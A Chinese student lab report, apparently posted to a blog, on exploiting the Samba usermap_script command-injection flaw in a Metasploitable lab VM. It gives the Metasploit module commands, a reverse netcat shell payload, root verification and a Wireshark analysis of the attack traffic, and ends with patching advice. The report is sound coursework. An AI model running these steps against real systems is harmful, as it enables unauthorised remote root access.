csycbdy  

《网络攻防实践》实验七报告

一、实验名称

Linux 远程渗透攻击与攻防对抗实践

二、实验目的

  1. 掌握 Metasploit 渗透测试框架的基本使用方法。
  2. 利用 Samba 服务 usermap_script 漏洞对 Metasploitable Linux 靶机实施远程渗透攻击。
  3. 成功获取目标主机远程 Shell 并获得 root 权限。
  4. 使用 Wireshark 捕获攻击流量,分析攻击全过程,理解漏洞利用原理。

三、实验环境

  • 攻击机:Kali Linux(IP:192.168.200.6
  • 靶机:Metasploitable Ubuntu(IP:192.168.200.25
  • 网络模式:VMware 仅主机/ NAT 模式,双向互通
  • 工具:Metasploit Framework、Wireshark

四、实验原理

1. 漏洞简介

Samba 是 Linux/Unix 上实现 SMB 协议的开源软件,用于文件与打印共享。
usermap_script 漏洞属于命令注入漏洞,攻击者可构造恶意用户名,远程执行任意系统命令,直接获取 root 权限。

2. 攻击流程

  1. 启动 Metasploit,加载漏洞利用模块
  2. 配置攻击载荷(Payload)
  3. 设置靶机 IP(RHOST)与攻击机本地 IP(LHOST)
  4. 发起攻击,获取反弹 Shell
  5. 执行系统命令,验证权限并进行流量分析

五、实验步骤

(一)查看ip地址

  1. kali:
    image

  2. Metasploitable Ubuntu:
    image

(二)连通性测试

在 Kali 中 ping 靶机:

ping 192.168.200.25

image

(三)Metasploit 渗透攻击

  1. 启动 Metasploit:
msfconsole

image

  1. 查找usermap_script安全漏洞,使用它并查看与该渗透攻击模块相兼容的攻击载荷。
search usermap_script
use 0
show payloads

image

3.本次实践已经给出要使用的攻击模块为samba服务,因此输入以下指令。
search samba
image

  1. 设置攻击载荷:
set payload cmd/unix/reverse_netcat

image

  1. 配置关键参数:
set LHOST 192.168.200.6   # 攻击机IP
set RHOST 192.168.200.25  # 靶机IP
  1. 发起攻击:
exploit

image

(四)获取 Shell 与权限验证

攻击成功后获得会话,执行以下命令:

  1. 查看当前 IP(靶机信息):
ifconfig

image

  1. 查看当前用户权限:
id
whoami

返回 uid=0(root),说明已获取root 最高权限
image

  1. 执行系统操作验证:
uname -a
cd /home
mkdir attack_verify
echo "samba_attack_success" > attack_log.txt
ls

image

(五)流量捕获与分析

  1. 攻击前启动 Wireshark,选择网卡开始抓包。
  2. 攻击完成后停止抓包,使用过滤器:
ip.addr == 192.168.200.6 && ip.addr == 192.168.200.25

image

3.会话建立阶段(No. 2-4):攻击机向靶机 139 端口发起 TCP 三次握手,建立 FTP 控制会话;
image

  1. 找到 SMB/TCP 数据包,右键 → 追踪 TCP 流。可看到:
    • 攻击机向靶机 139 端口发起连接
    • SMB 协商过程
    • 恶意命令注入过程
    • 反弹 4444 端口建立 Shell 会话
      image

5.这张图是攻击机向靶机发送的恶意命令流。可以看到 Metasploit 自动生成了多段注入指令,包括随机字符串校验、系统命令探测和 Python 反弹 Shell 代码,这些指令通过 Samba 漏洞注入,是攻击载荷执行的关键过程。
image

6.这张图是靶机对攻击命令的响应流。可以看到靶机成功执行了攻击机发送的echo命令并返回结果,同时输出了连接尝试的错误日志,证明命令注入已成功,靶机正在执行攻击载荷并尝试建立反弹会话。
image

六、实验结果

  1. 成功利用 Samba usermap_script 漏洞获取靶机 root 权限
  2. 成功在靶机创建文件、执行系统指令,控制目标主机。
  3. 完整捕获攻击流量,清晰分析出攻击流程、漏洞利用方式与命令执行过程。

七、问题与解决方法

  1. 问题:设置 IP 后无法 ping 通。
    • 解决:检查虚拟机网段,确保攻击机与靶机在同一子网;正确配置网关与子网掩码。
  2. 问题:exploit 执行失败,无法建立会话。
    • 解决:确认 LHOST 为本机正确 IP;关闭防火墙;重新启动模块与靶机服务。
  3. 问题:Wireshark 抓包杂乱,难以定位攻击流量。
    • 解决:使用 IP 地址过滤,只保留攻击机与靶机之间的流量。

八、实验总结

本次网络攻防实践实验中,我通过搭建Kali攻击机与Metasploitable靶机的实验环境,成功完成了基于Samba usermap_script漏洞的远程渗透攻击实践,掌握了Metasploit框架的模块加载、参数配置与漏洞利用流程,验证了静态IP配置、连通性测试、流量捕获分析等关键步骤,直观理解了命令注入漏洞的利用原理与反弹Shell的建立过程;实验让我深刻认识到未修补高危漏洞对系统安全的严重威胁,也提升了渗透测试与流量分析的实践能力,为后续网络攻防学习奠定了扎实基础。
实验表明,未修补的高危漏洞可使攻击者轻易获取系统最高权限,危害极大。在实际防护中应及时更新补丁、关闭无用服务、配置防火墙并开启日志审计。

posted on 2026-04-22 18:00  nepenthe词不达意  阅读(7)  评论(0)    收藏  举报